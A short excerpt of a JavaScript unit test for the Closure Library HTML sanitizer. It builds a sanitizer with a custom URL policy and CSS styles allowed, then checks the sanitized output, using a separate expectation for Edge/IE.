      new goog.html.sanitizer.HtmlSanitizer.Builder()
1494
          .withCustomNetworkRequestUrlPolicy(goog.html.SafeUrl.sanitize)
1495
          .allowCssStyles()
1496
          .build();
1497
  if (goog.userAgent.EDGE_OR_IE) {
1498
    assertEquals(
1499
        expectedIE, goog.html.SafeHtml.unwrap(sanitizer.sanitize(input)));
1500
  } else {
1501
    assertSanitizedHtml(input, input, sanitizer);
1502
  }
1503
}
1504

1505
Product

Resources

Company